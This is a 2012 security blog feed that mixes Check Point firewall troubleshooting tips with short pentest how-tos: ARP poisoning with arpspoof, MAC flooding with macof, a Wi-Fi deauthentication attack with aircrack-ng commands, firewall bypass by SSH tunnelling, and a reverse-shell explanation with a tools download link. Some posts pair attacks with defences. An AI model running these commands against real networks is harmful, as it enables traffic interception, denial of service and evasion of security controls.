<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br />
<br /> </div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br />
<a href="http://www.computerworld.com.tr/bilgi-guvenligi-farkindaligi-artiyor">http://www.computerworld.com.tr/bilgi-guvenligi-farkindaligi-artiyor</a></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<strong>BTHaber</strong></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<strong>No:888 September 2012</strong><a href="http://2.bp.blogspot.com/-3SlM32s2b2g/UJ49FLGAnjI/AAAAAAAAAP0/k5LNkJr4cSc/s1600/btlogo.jpg" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" rea="true" src="http://2.bp.blogspot.com/-3SlM32s2b2g/UJ49FLGAnjI/AAAAAAAAAP0/k5LNkJr4cSc/s1600/btlogo.jpg" /></a></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<br />
<a href="http://4.bp.blogspot.com/-BVw_9GSk9OA/UJ49v489p0I/AAAAAAAAAQM/Ly6LQwWGVGM/s1600/bthaber_cagdasulucan.JPG" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" rea="true" src="http://4.bp.blogspot.com/-BVw_9GSk9OA/UJ49v489p0I/AAAAAAAAAQM/Ly6LQwWGVGM/s1600/bthaber_cagdasulucan.JPG" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-105856749592061762012-10-19T17:15:00.000+03:002012-10-22T11:25:31.883+03:00Reverse Connection Shell<br />
<strong>Problem :</strong><br />
Unreachable Server Behind Firewall (Simulation of Reverse Shell)<br />
<strong>Solution: </strong><br />
A solution to this problem is to have the server(victim) reach out and connect to the client. In such a case, the client(attacker) will listen on a port, say, port 80, and the server will then attempt to connect every 5 seconds. If the client is not up, the server waits 5 seconds and then tries again. If a client is up, it will then establish a connection and gives a shell to the client. The client will then be able to send commands, and they will execute on the server side. This technology is called Reverse Connection Shell.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-J2RNnFQclj8/UIFfkcmETfI/AAAAAAAAAPE/5QbAAaHyFjY/s1600/Capture_RS_cagdas.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" nea="true" src="http://1.bp.blogspot.com/-J2RNnFQclj8/UIFfkcmETfI/AAAAAAAAAPE/5QbAAaHyFjY/s400/Capture_RS_cagdas.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-zzypjnkNEnU/UIFiYSL1IFI/AAAAAAAAAPY/zaZNc-QavzY/s1600/RS_Exit.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="49" nea="true" src="http://2.bp.blogspot.com/-zzypjnkNEnU/UIFiYSL1IFI/AAAAAAAAAPY/zaZNc-QavzY/s320/RS_Exit.JPG" width="320" /></a></div>
<br />
<strong>Download from the link below</strong><br />
<br />
<a href="https://docs.google.com/open?id=0B0EDab8sQhCCQ0JsemtaMHdkMm8" target="_blank">Download ReverseShell Tools</a> by Cagdas UlucanCagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-86036083993348402942012-10-15T17:18:00.000+03:002012-10-16T16:47:32.554+03:00Bypass none L7 Firewall/Proxy systems (SSH Tunnelling)By tunneling technics it's possible to penetrate none L7 firewalls as they don't inspect the content of the packet. <br />
as usually port 80 and 443 is allowed for internal users and also SSH protocol supports socks proxy, this can be used to connect remote ssh servers that runs from port:443, you may place your own or find public ssh servers on net<br />
<br />
here is the screenshot doing it via putty<br />
<br />
<a href="http://4.bp.blogspot.com/-FdnqVhwQ5XQ/UHwaI2rRcsI/AAAAAAAAAOg/AfHNj_tWLiU/s1600/Capture12.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="307" nea="true" src="http://4.bp.blogspot.com/-FdnqVhwQ5XQ/UHwaI2rRcsI/AAAAAAAAAOg/AfHNj_tWLiU/s320/Capture12.JPG" width="320" /></a><br />
<a href="http://2.bp.blogspot.com/-2v1DvwiZRWo/UHwaNua_fZI/AAAAAAAAAOo/s-_7T6ktEHg/s1600/Capture13.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="134" nea="true" src="http://2.bp.blogspot.com/-2v1DvwiZRWo/UHwaNua_fZI/AAAAAAAAAOo/s-_7T6ktEHg/s320/Capture13.JPG" width="320" /></a><br />
<a href="http://1.bp.blogspot.com/-BzKktNoH5ro/UHwaQNuA6lI/AAAAAAAAAOw/Ah7c85xaVE8/s1600/Capture14.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" nea="true" src="http://1.bp.blogspot.com/-BzKktNoH5ro/UHwaQNuA6lI/AAAAAAAAAOw/Ah7c85xaVE8/s320/Capture14.JPG" width="296" /></a><br />
<br />
some other ways of penetration may be using proxy softwares like ultrasurf, making vpn to outside,using remote connection softwares like teamviewer (reverse connection), note that all of these techniques uses port 443<br />
<br />
<br />
<strong>I wanted to draw your attention to importance of inspecting SSL traffic as it can be used for several illegal connections that can cause data leakage in your network</strong><br />
<br />
Thx<br />
Cagdas<br />
<br />Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-56581760115230450842012-10-09T21:13:00.001+03:002012-10-10T15:07:15.767+03:00How to Convert victim switch to a HUBFirst way<br />
<strong>ARP Poisoning (arpspoof)</strong><br />
Attack is based on <span a="undefined" c="4" class="short_text" closure_uid_qh3ead="123" id="result_box" lang="en"><span class="hps" closure_uid_qh3ead="217">weakness of ARP protocol, its </span></span>so old and limited to local network segments but still one of the biggest threat on L2 networks<br />
Enable routing on the attacker so that it can route the traffic back to victim, its required if you dont want to make DOS, to silently listen the traffic.<br />
"echo 1 > /proc/sys/net/ipv4/ip_forward" # enable IP forwarding in the Linux kernel.<br />
to test whats going on at the victim machine type arp -a and check the mac of the victims gw once started to poison it will change the value to attackers mac address<br />
<br />
Lets start<br />
first SSH<br />
# arpspoof -t victimip gwip<br />
Second SSH<br />
# arpspoof -t gwip victimip<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-aV-yPp8dkoI/UHRpEhjKwyI/AAAAAAAAAOM/bp56XiqbdAw/s1600/asrspoof.JPG" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" nea="true" src="http://4.bp.blogspot.com/-aV-yPp8dkoI/UHRpEhjKwyI/AAAAAAAAAOM/bp56XiqbdAw/s1600/asrspoof.JPG" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<strong>Protection from ARP Poisoning</strong><br />
<span style="color: blue;"><span style="color: black;">Open Dynamic ARP Inspection</span> </span>on the related switch,<br />
<br />
If you have a dhcp server<br />
<span style="color: black;">Cisco(config)# IP dhcp snooping vlan </span><br />
<span style="color: black;">Cisco(config)# IP arp inspection vlan </span><br />
<span style="color: black;">Cisco(config)# interface GigabitEthernet 1/11 </span><br />
<span style="color: black;">Cisco(config-if)# IP dhcp snooping trust </span><br />
<span style="color: black;">Cisco(config-if)# IP arp inspection trust</span><br />
<br />
If not, you have to manually set static ip-mac addresses <br />
<span style="color: black;">Cisco(config)# IP arp inspection vlan </span><br />
<span style="color: black;">Cisco(config)# IP source binding vlan interface Gi1/1 </span><br />
<span style="color: black;">Cisco(config)# arp access-list </span><br />
<span style="color: black;">Cisco(config-arp-acl)# permit IP host mac host </span><br />
<span style="color: black;">Cisco(config)# IP arp inspection filter vlan</span><br />
<br />
<strong>Second way</strong><br />
<strong>Mac Flooding</strong> is to attack with lots of bogus ARP packets on a switch network, thus overloading the switch CAM tables and making it acting like a hub.<br />
A typical switch can handle few thousands of ARP records and can be overloaded.<br />
Once its overloaded you may start sniffing..<br />
<br />
you may use the tool macof<br />
#macof -i eth0<br />
<br />
Protection of this attack is simply enabling Port SecurityCagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-71378320157858606642012-10-04T11:21:00.004+03:002012-10-05T09:38:35.312+03:00DOS on Wireless Networks (wlan jammer)<strong>Deauthentication attack on wireless networks</strong><br />
As a result everyone from your attacked network will be kicked out from it,we may say that Its simply a DoS<br />
<br />
The connection between the Mesh clients and Mesh APs has been be established by the exchange of various frames.After that the exchange of the series of management frames like authentication and association request frame takes place.As these frames are unprotected and sent in clear. So these frames has been spoofed by the attacker. The attacker then sends deauthentication requests with the client’s address set as the source. Then the mesh AP responds by sending the deauthentication response to the client. Thus the communication between the client and the AP has been halted. As deauthentication requests are notifications, so cannot be ignored and the AP responds instantly to these requests . The attacker can periodically scan all the channels and send these spoofed messages to valid clients thus terminating their connection.<br />
<br />
During the attack the client has been deauthenticated and thus may probe other networks and connect to any other mesh AP available in the range with good signal strength.Second stage of this DOS can be Rogue AP Attack.<br />
<br />
<strong># airmon-ng</strong> (shows your wlan interfaces)<br />
<strong># airmon-ng start wlan0</strong> (enable monitoring mode on wlan0)<br />
<strong># airodump-ng mon0</strong> (Get the related info of victim AP)<br />
<strong># airodump-ng -c 11 -b 1C:65:9D:B5:D8:C1 mon0</strong> (go inside the related AP, define channel and MAC)<br />
<strong># aireplay-ng --deauth 100 -c FF:FF:FF:FF:FF:FF -a 1C:65:9D:B5:D8:C1 mon0</strong> (start sending deauthentication packets,Open a separate ssh session)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-96akLT_3mc8/UG1GueA-NII/AAAAAAAAANw/DayWTezUkao/s1600/Capture1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="247" mea="true" src="http://3.bp.blogspot.com/-96akLT_3mc8/UG1GueA-NII/AAAAAAAAANw/DayWTezUkao/s400/Capture1.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-XNbSX_zIOyk/UG1G1LAvPfI/AAAAAAAAAN4/khrPmdf5drU/s1600/Capture2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="157" mea="true" src="http://1.bp.blogspot.com/-XNbSX_zIOyk/UG1G1LAvPfI/AAAAAAAAAN4/khrPmdf5drU/s400/Capture2.JPG" width="400" /></a></div>
<br />
I also decided to write other than Checkpoint, <br />
more pentest related notes will be on this site.<br />
<br />
Thx <br />
CagdasCagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-46503059497286857162012-09-14T17:50:00.002+03:002012-12-11T17:56:24.913+02:00Checkpoint DDOS Protector<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
Today, I had a chance to deal with new Checkpoint DDoS Protector device.</div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
Here is a short video that shows some attack vectors and response of ddos appliance</div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
There was a DDoS_8412 and R75.45 FW between the hacker pc and test victim.</div>
<br />
<iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="http://www.youtube.com/embed/5rhw7zsiarQ" width="560"></iframe><br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-4uOCw_BUEf0/UFNFjHJ5PhI/AAAAAAAAAL0/ynf_NBZWOdA/s1600/ddospic.jpg" imageanchor="1" style="height: 325px; margin-left: 1em; margin-right: 1em; width: 600px;"><img border="0" hea="true" height="142" src="http://1.bp.blogspot.com/-4uOCw_BUEf0/UFNFjHJ5PhI/AAAAAAAAAL0/ynf_NBZWOdA/s400/ddospic.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-30271784129537965252012-08-31T13:45:00.001+03:002012-09-19T10:21:59.719+03:00Interface rx-drp on Checkpoint firewallsIf your eth-driver is bnx2 apply the related driver upgrade at sk80640<br />
I also know that there are driver upgrades for e1000 search it from support<br />
to see the driver # ethtool -i eth0<br />
<br />
Also note to check the buffer size on related eth<br />
# ethtool -g eth0<br />
The related sk is sk42181<br />
<br />
# netstat -i will show you the drop counts on interfaces.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-KOy4HEZVCdY/UECVi3mfDwI/AAAAAAAAALg/cFORwMYvel4/s1600/rx-drp-checkpoint.png" imageanchor="1" style="clear: left; cssfloat: left; float: left; height: 151px; margin-bottom: 1em; margin-right: 1em; width: 617px;"><img border="0" fea="true" height="97" src="http://3.bp.blogspot.com/-KOy4HEZVCdY/UECVi3mfDwI/AAAAAAAAALg/cFORwMYvel4/s400/rx-drp-checkpoint.png" width="400" /></a></div>
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-36680157813503860442012-08-31T13:43:00.000+03:002012-08-31T13:49:09.873+03:00Error: Page cannot be displayed. An error occurred while processing the request.I have encountered a strange error on Mobile Access Blade, In my case this was related to IPS, Try this;uncheck IPS and mobile access on firewall properties, install policy, then recheck them and reinstall the security policy.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-UX19QRXZLMM/UECVDxKLQJI/AAAAAAAAALY/PLhsNPvLi7A/s1600/vpnpage.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" fea="true" height="185" src="http://4.bp.blogspot.com/-UX19QRXZLMM/UECVDxKLQJI/AAAAAAAAALY/PLhsNPvLi7A/s400/vpnpage.jpg" width="400" /></a></div>
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-63799903628447342432012-08-04T17:10:00.000+03:002012-09-16T13:07:41.168+03:00How to upgrade the software and migrate a distributed SmartCenter to a Full HA ClusterThis procedure is my solution method...<br />
<br />
Take an upgrade_export file from the source SMC and import it to your vm machine with the same name and upgrade it to the version u want.<br />
This is a MNG so you cant export and import it to a standalone firewall machine,<br />
lets fake the system that its also a firewall with the command<br />
# cpprod_util FwSetFirewallModule 1<br />
check it via # cpprod_util FwIsFireWallModule<br />
close SmartDashboard and relogin, you will see the firewall tab. <br />
take a new upgrade_export for the utm box<br />
You have to install the appliance as full HA primary cluster member and then,<br />
# cp_conf fullha disable disable its cluster membership...<br />
import the config reboot and<br />
# cp_conf fullha enable to set it back to fullhacluster<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-3NdU6ADHYLg/UB0x8yu19tI/AAAAAAAAAJs/XBgY0kGTiVg/s1600/mngtofullha.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" eda="true" height="227" src="http://4.bp.blogspot.com/-3NdU6ADHYLg/UB0x8yu19tI/AAAAAAAAAJs/XBgY0kGTiVg/s320/mngtofullha.jpg" width="320" /></a></div>
<br />
<br />
Thats it, Goodluck<br />
CagdasCagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-24317363101545927232012-07-26T12:24:00.001+03:002012-07-26T12:24:49.265+03:00DDOS Tuning for Checkpoint IPS BladeThese are the main things to check against ddos related attacks on checkpoint, <br />but of course not enough for sophisticated layer 7 attack techniques, checkout new radware based checkpoint ddos appliance; <a href="http://www.checkpoint.com/products/ddos-protector/index.html" target="_blank">ddos protector.</a><br />
<br />
<strong>Aggressive aging:</strong> protection against connection-consuming attacks<br /><strong>Lower Stateful Inspection timers:</strong> defense against slow attack<br /><strong>Geo protection:</strong> Rules to block by country and direction of traffic<br /><strong>Network quota:</strong> limit number of connections by source IP<br /><strong>Worm catcher signature:</strong> block known worms (HTTP and CIFS)<br /><strong>TCP window size enforcement:</strong> small TCP window and flood<br /><strong>SYN flood protection:</strong> cookie-based validation <br /><strong>HTTP flooding / UDP Flooding:</strong> rate-based blocking<br /><strong>non-TCP Flooding:</strong> restrict non-TCP traffic from occupying more than a given percentage of an enforcement point State table<br />
<br />Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-53967150206188760262012-07-18T15:45:00.001+03:002012-07-18T15:46:31.022+03:00Checkpoint Port Based Routing in ISP RedundancyIts possible that certain outgoing connections be routed specifically through the first ISP link at ISP Redundancy Load Sharing Mode<br />
edit the $FWDIR/lib/table.def as follows<br />
By changing it to: no_misp_services_ports = { <500, 17>, <259, 17>, <80,6>};, (where <25,6> stands for SMTP (port 25), TCP (IP protocol 6)), all outgoing SMTP traffic would go through the first ISP link.<br />
<br />
<br />
Also some tips<br />
Show the currently defined ISP links<br />
#cpstat fw<br />
Test ISP Redundancy by administratively bringing down/up thelink<br />
# fw isp_link ISP-1 down<br />
# fw isp_link ISP-1 up<br />
<br />
more advanced commands will be on next release of <a href="http://www.smartsplat.com/" target="_blank">SmartSPLAT</a><br />
<br />Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-71914561554789691502012-07-04T10:47:00.000+03:002012-07-04T10:47:15.610+03:00Cant access to Mobile Access Portal, Browser keeps loading without giving an errorLook under /opt/CPcvpn-R75.20/log/cvpnd.elg for the problem reason,<br />In my case it was showing<br />
Exception: open("/opt/CPcvpn-R75.20/conf/includes/CustomRulesAfter.conf") failed - No such file or directory - CVPND aborting<br />
manually create the file or files,<br />
touch /opt/CPcvpn-R75.20/conf/includes/CustomRulesAfter.conf<br />touch /opt/CPcvpn-R75.20/conf/includes/CustomRulesBefore.conf<br />
and do a cvpnrestart<br />
Also check licenses on both cluster members...Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-75782927025645689392012-06-27T17:07:00.001+03:002012-06-27T17:07:26.391+03:00SNX page can not be displayed errorWe have faced this issue again..<br />
<br />
Solution:<br />
uninstall this update KB2585542 <br />
or<br />
Change the Encryption setting from <br />AES, 3DES to AES, 3DES, RC4<br />in the Global Settings for the Remote Access / SSL Network Extender<br />Install Policy to the Gateway.Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-58245536428533090452012-06-14T21:10:00.000+03:002012-07-26T12:26:26.580+03:00Packet (ping) latency through Checkpoint FirewallCheckout the antispoofing settings and be sure that its configured on all interfaces and also check securexl settings..<br />Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-23075041836248041772012-06-14T21:08:00.003+03:002012-06-14T21:08:50.258+03:00How to Install a public CA to Mobile Access / Connectra1. Generate the CSR <br />-------------------------------<br />run "csr_gen <filename>" and follow the instructions.<br />!NOTE! If the files <filename>.csr and .key still exists, the files are overwritten without warning!<br />
Output:<br />-> <filename>.key (keyfile)<br />This is the private key. You are requested if you want to protect this file with a passphrase - please do so. Protect this file and keep it secure. <br />You need this file and the passphrase later to install the certificate.<br />-> <filename>.csr<br />
This is the certificate signing request that you have to send to your CA.<br />you will receive the signed certificate from your CA (certfile)<br />
<br />2. Convert certfile to PEM-Format<br />-----------------------------------------------------------<br />If the file you receive is from your CA is in p12 or pfx format convert the file into PEM format (sk30997):<br />
$CVPNDIR/bin/p12ToPem <input-filename(.p12 / <br />
e.g. $CVPNDIR/bin/p12ToPem cert.pfx<br />
If the file you receive is from your CA is in p7b, spc or PKCS#7 format convert the file into PEM format:<br />
$CVPNDIR/bin/p7bToPem <filename (.p7b, .spc, ...)> <output filename (.crt)><br />
e.g. $CVPNDIR/bin/p7bToPem cert.p7b cert.crt<br />
Output:<br />->certfile in PEM-format <filename>.crt<br />
<br />3. Install the generated certificate:<br />--------------------------------------------------<br />Use this command to install the previous generated certificate:<br />
$CVPNDIR/bin/InstallCert <certfile> <keyfile> '<passphrase>'<br />
4. Restart Daemon<br />----------------------------<br />Run "cvpnrestart" on the Gateway<br />
<br />Repeat step 3. and 4. on each member<br />Finally reinstall the policy to the cluster.Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-62542012212879480742012-06-10T14:24:00.004+03:002012-09-18T00:12:36.196+03:00Policy Install Load on Module FailedLast week I was dealing with a policy installation problem,<br />
fwm.elg was pointing to duplicate fw object name and some certificate related problems..<br />
After placing the upgrade_export to a VM test machine, I saw that I can install the policy on it, so I have decided to reset SIC on both members one by one and this resolved our problem.<br />
<br />
<a href="http://www.smartsplat.com/" target="_blank">SmartSPLAT</a> may help you to examine this type of problems..<br />
Load Policy to Firewall<br />
# fwm load $FWDIR/conf/Standard.W FirewallName > /var/tmp/policy_install.ctl 2>&1<br />
Also try<br />
Fetching the Policy from SMC<br />
# fw fetch SMCName<br />
and fetching locally<br />
# fw -d fetchlocal -d $FWDIR/state/__tmp/FW1/<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-zFTAQmhDxME/T9SDaOKNV2I/AAAAAAAAAJQ/V30M0txSTIY/s1600/policyinstall.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" fba="true" height="121" src="http://3.bp.blogspot.com/-zFTAQmhDxME/T9SDaOKNV2I/AAAAAAAAAJQ/V30M0txSTIY/s640/policyinstall.jpg" width="640" /></a></div>
<div style="text-align: center;">
<a href="http://www.smartsplat.com/"><span style="font-family: Verdana, sans-serif; font-size: x-small;">www.smartsplat.com</span></a></div>
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.com